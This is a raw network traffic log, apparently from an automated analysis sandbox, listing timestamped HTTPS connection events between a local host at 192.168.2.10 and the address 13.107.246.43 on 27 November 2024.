                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.419910908 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.420408010 CET49953443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.420413971 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.447829008 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.447864056 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.448057890 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.448707104 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.448719978 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.463706970 CET4434994813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467197895 CET4434994813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467350006 CET49948443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467580080 CET49948443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467580080 CET49948443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467597961 CET4434994813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.467606068 CET4434994813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.470359087 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.470386028 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.470513105 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.470657110 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.470666885 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.695061922 CET4434995013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.697891951 CET4434995013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.698019981 CET49950443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.698065042 CET49950443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.698076010 CET4434995013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.698091030 CET49950443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.698096037 CET4434995013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.700968027 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.700984955 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.701169968 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.701323032 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.701330900 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.815340042 CET4434995213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819077969 CET4434995213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819140911 CET49952443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819189072 CET49952443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819215059 CET4434995213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819221973 CET49952443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.819230080 CET4434995213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.821871042 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.821911097 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.822025061 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.822165966 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.822181940 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862379074 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862404108 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862457037 CET49953443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862478018 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862803936 CET49953443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862803936 CET49953443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862814903 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862965107 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.862993956 CET4434995313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.863178968 CET49953443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.865590096 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.865628958 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.865715981 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.865864038 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:35.865875006 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.266464949 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.266908884 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.266931057 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.267421007 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.267431021 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.271140099 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.273061991 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.273075104 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.273430109 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.273435116 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.496201992 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.497925043 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.497936964 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.498549938 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.498554945 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.691942930 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.693717003 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.693752050 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.694367886 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.694374084 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.714998960 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.716660023 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.717688084 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.717830896 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.717895031 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.719595909 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.719647884 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.719660044 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.719702959 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.750118017 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.780087948 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.780117035 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.780131102 CET49961443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.780138016 CET4434996113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.782608032 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.782614946 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.782627106 CET49963443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.782632113 CET4434996313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.784234047 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.784254074 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.784921885 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.784931898 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.787803888 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.787852049 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.787946939 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.788695097 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.788746119 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.788819075 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.789047956 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.789057970 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.789138079 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.789155006 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.940247059 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.940485954 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.941282034 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.941817999 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.941840887 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.941859007 CET49966443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.941864967 CET4434996613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.950202942 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.950256109 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.950481892 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.950788021 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:37.950804949 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.136742115 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140500069 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140582085 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140671968 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140671968 CET49968443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140693903 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.140705109 CET4434996813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.148453951 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.148503065 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.148682117 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.149872065 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.149888992 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.207684040 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210479021 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210596085 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210614920 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210676908 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210767031 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210789919 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210823059 CET49967443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.210829973 CET4434996713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.214026928 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.214073896 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.214133978 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.214308977 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:38.214322090 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.519078970 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.519678116 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.519702911 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.520119905 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.520127058 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.577510118 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.578008890 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.578021049 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.578429937 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.578435898 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.737277031 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.737931967 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.737977028 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.738377094 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.738385916 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.930545092 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.931102991 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.931124926 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.931646109 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.931652069 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.954618931 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958025932 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958080053 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958087921 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958134890 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958209991 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958209991 CET49976443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958230972 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.958240032 CET4434997613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.961325884 CET49982443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.961378098 CET4434998213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.961474895 CET49982443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.961646080 CET49982443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.961658955 CET4434998213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022511005 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022567034 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022648096 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022664070 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022880077 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022895098 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.022919893 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.023179054 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.023207903 CET4434997513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.023422956 CET49975443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.026096106 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.026141882 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.026206017 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.026364088 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.026375055 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.065020084 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.065464973 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.065483093 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.065973043 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.065979004 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.183065891 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186189890 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186259031 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186268091 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186320066 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186499119 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186525106 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186537981 CET49977443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.186542988 CET4434997713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.189065933 CET49985443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.189111948 CET4434998513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.189202070 CET49985443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.189433098 CET49985443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.189445019 CET4434998513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.378246069 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381603956 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381695032 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381756067 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381786108 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381830931 CET49978443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.381836891 CET4434997813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.419054985 CET49986443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.419121027 CET4434998613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.419223070 CET49986443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.419682980 CET49986443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.419698954 CET4434998613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.519526005 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.522646904 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.525219917 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.527379036 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.527407885 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.527421951 CET49979443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.527427912 CET4434997913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.586071968 CET49987443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.586137056 CET4434998713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.586252928 CET49987443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.632934093 CET49987443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.632976055 CET4434998713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.750580072 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.751188040 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.751219034 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.751643896 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.751656055 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.765228033 CET4434998213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.765872002 CET49982443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.765903950 CET4434998213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.766406059 CET49982443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.766415119 CET4434998213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.973184109 CET4434998513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.980313063 CET49985443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.980353117 CET4434998513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.980983973 CET49985443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:41.980990887 CET4434998513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.187089920 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190771103 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190819979 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190850973 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190882921 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190942049 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190964937 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190980911 CET49983443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.190989971 CET4434998313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.193902969 CET49990443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:42.193953991 CET4434999013.107.246.43192.168.2.10
